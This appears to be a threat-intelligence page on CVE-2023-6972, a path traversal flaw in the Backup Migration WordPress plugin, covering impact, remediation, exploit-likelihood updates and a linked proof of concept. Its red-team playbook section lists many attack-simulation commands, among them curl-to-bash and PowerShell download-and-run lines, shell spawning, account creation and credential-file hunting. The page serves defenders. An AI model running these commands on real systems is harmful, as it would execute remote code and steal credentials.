CVE-2023-6972
Overview
This vulnerability is a path traversal flaw rooted in improper validation of HTTP header inputs within the Backup Migration plugin for WordPress. Specifically, the plugin fails to sanitize the 'content-backups' and related headers ('content-name', 'content-manifest', 'content-bmitmp', 'content-identy'), allowing crafted header values to manipulate file system paths. The affected component is the Backup Migration plugin up to version 1.3.9, which processes these headers to manage backup content.
Vulnerability Description
The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to delete arbitrary files on the server, including key configuration files such as wp-config.php. This deletion can facilitate site takeover and enable remote code execution by destabilizing the WordPress environment. The attack requires no authentication or user interaction and can be executed over the network, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). Consequences include complete compromise of the affected WordPress site and potential lateral movement within the hosting environment.
Solution
Users of the Backup Migration plugin for WordPress should upgrade to a version later than 1.3.9 where this vulnerability is addressed. Detailed patch instructions and version updates are available via the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/0a3ae696-f67d-4ed2-b307-d2f36b6f188c) and the official WordPress plugin repository. Reviewing and replacing the affected files backup-heart.php and bypasser.php with their updated counterparts is recommended to mitigate this path traversal issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Backup Migration plugin for WordPress exhibits a critical vulnerability characterized by a path traversal flaw. This security weakness arises from improper validation of user-supplied input in HTTP headers, specifically 'content-backups', 'content-name', 'content-manifest', 'content-bmitmp', and 'content-identy'. Attackers can exploit this vulnerability to manipulate file paths, enabling them to access sensitive files outside the intended directory structure. The implications of this flaw are severe, as it allows unauthenticated users to delete arbitrary files on the server, including vital configuration files such as wp-config.php. This file typically contains sensitive information, including database credentials and secret keys, which are crucial for the overall security of the WordPress installation.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious HTTP request that includes specially formatted headers to traverse the file system. For instance, by using directory traversal sequences like "../", an attacker could navigate to critical directories and execute file deletion commands. Once they gain access to the wp-config.php file, they could potentially alter the site’s configuration, leading to a complete takeover of the WordPress instance. Furthermore, if the attacker manages to upload malicious scripts or files, they could achieve remote code execution, allowing them to execute arbitrary commands on the server, thereby compromising the entire hosting environment.
The real-world impact of this vulnerability is significant, particularly for businesses relying on WordPress for their online presence. A successful attack could lead to unauthorized access to sensitive data, loss of critical files, and potential downtime for the website. The ramifications extend beyond immediate operational disruptions; businesses may suffer reputational damage, loss of customer trust, and potential legal implications, especially if sensitive customer data is exposed. Additionally, the financial repercussions of remediation efforts, including incident response, recovery, and potential regulatory fines, can be substantial. Given the high CVSS score associated with this vulnerability, organizations must prioritize its remediation to safeguard their digital assets.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Regularly updating the Backup Migration plugin to the latest version is crucial, as updates often include security patches that address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit this flaw. Implementing strict access controls and monitoring server logs for unusual activity can also aid in early detection of potential exploitation attempts. Furthermore, conducting regular security audits and vulnerability assessments can help identify and remediate weaknesses in the system before they can be exploited by malicious actors.
In conclusion, the path traversal vulnerability in the Backup Migration plugin for WordPress poses a significant threat to the security and integrity of affected systems. The ability for unauthenticated attackers to delete critical files, including configuration files, can lead to severe consequences for businesses. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to detect and mitigate these risks effectively. Proactive measures, including timely updates, monitoring, and security assessments, are essential to maintaining a robust security posture in the face of evolving threats.
Recent updates to the CVE-2023-6972 vulnerability reveal a significant reassessment of its severity, with the CVSS score now elevated to 9.8 from an initial 0.0. This recalibration reflects a clearer understanding of the exploit’s potential impact, particularly its capacity for unauthenticated attackers to delete critical files such as wp-config.php, thereby enabling site takeover and remote code execution. Concurrently, CSURFACE threat intelligence has detected the emergence of an Exploit Prediction Scoring System (EPSS) score of 0.1903, placing this vulnerability in the 95th percentile for likely exploitation. The EPSS score has shown a marked upward trajectory over the past week, indicating a rapidly increasing risk of active exploitation attempts in the wild. Although no new exploit samples or proof-of-concept code have been publicly disclosed, the rising EPSS score and CVSS adjustment underscore a heightened threat environment. For defenders, this shift signals an urgent need to prioritize detection and response efforts related to this vulnerability, as the probability of exploitation has moved from theoretical to imminent. The updated risk assessment elevates CVE-2023-6972 to a critical threat, reflecting both its technical severity and the growing likelihood of exploitation, thereby demanding increased vigilance within affected WordPress environments.
Update 2 — April 20, 2026
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2023-6972 with the emergence of a publicly available proof-of-concept exploit hosted on GitHub. This marks the first known instance of exploit code being openly shared, lowering the barrier for threat actors to weaponize this critical path traversal vulnerability in the Backup Migration WordPress plugin. Our telemetry indicates a corresponding upward trend in the Exploit Prediction Scoring System (EPSS) score, reflecting increased likelihood of active exploitation attempts. While this rise is not yet classified as rapid, the availability of exploit tools directly correlates with heightened risk of unauthorized file deletions, including critical configuration files such as wp-config.php, which could facilitate full site compromise and remote code execution. For defenders, this shift from theoretical to practical exploitability necessitates immediate attention to detection and monitoring strategies, as the vulnerability’s threat level escalates from critical severity to an imminent exploitation scenario. The presence of public exploit code also increases the potential for opportunistic attacks by less sophisticated adversaries, broadening the threat actor pool and amplifying the urgency for defensive readiness.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Backupbliss | Backup Migration | All |
cpe:2.3:a:backupbliss:backup_migration:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0x00phantom-hat/CVE-2023-6972-Exploit-Arbitrary-File-Deletion
This repository contains a Proof of Concept (PoC) exploit for CVE-2023-6972.
|
0x00phantom-hat | 2 | 0 | 2026-04-13 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6972 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/0a3ae696-f67d-4ed2-b307-d2f36b6f188c?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.9/includes/backup-heart.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.9/includes/bypasser.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3012745/backup-backup |